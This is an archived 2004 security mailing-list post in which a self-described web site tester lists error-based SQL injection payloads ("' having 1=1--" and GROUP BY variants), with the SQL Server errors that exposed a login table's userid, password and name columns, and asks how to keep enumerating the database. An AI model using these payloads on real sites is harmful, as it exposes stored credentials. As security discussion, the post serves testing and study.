WebApp Sec mailing list archives

Enumerating databases...

From: KrK <krk41 () yahoo com>
Date: Sun, 19 Sep 2004 11:29:09 -0700 (PDT)

 Hi List,
   I have been doing testing of a web site and have
   found all the errors as detailed in the advanced
sql injection paper by ngsoftware and in Hacme
   bank.

   I have been stuck on the way because of a
   different error and am unable to
   enumerate the database further. Here is the list
   of tests that i have done
   and the corresponding output, if anyone could
   suggest on how to enumerate
   the rest of the table fields it would be great.

   step 1: userid='%20having%201%3d1%2d%2d
    (encoded form of ' having 1=1--)
   result 1:
   Column 'logindetls.userid' is invalid in the
   select list because it is not
   contained in an aggregate function and there is
   no GROUP BY clause.

   step
2:'%20GROUP%20BY%20logindetls.userid%20having%201=1--
   result 2:
   Column 'logindetls.password' is invalid in the
   select list because it is not
   contained in either an aggregate function or the
   GROUP BY clause.

   step
3:userid='%20GROUP%20BY%20logindetls.userid,logindetls.password%20having%201
   =1--

   result 3:
   Column 'logindetls.name' is invalid in the
select
   list because it is not
   contained in either an aggregate function or the
   GROUP BY clause.

   and so on and so forth until i reach a point
   where i get this error:

   [Microsoft][ODBC SQL Server Driver][SQL
   Server]:the text, ntext, and image data types
   cannot be compared or sorted,
   except when using IS NULL or LIKE operator

The application, i feel, stores text data in one of
the fields which results in the generation of this
error.Has anyone in the list come across this? any
clues on how to enumerate the database further?
Thanking you,
Krk

=====
" DON'T WORRY BE HAPPY,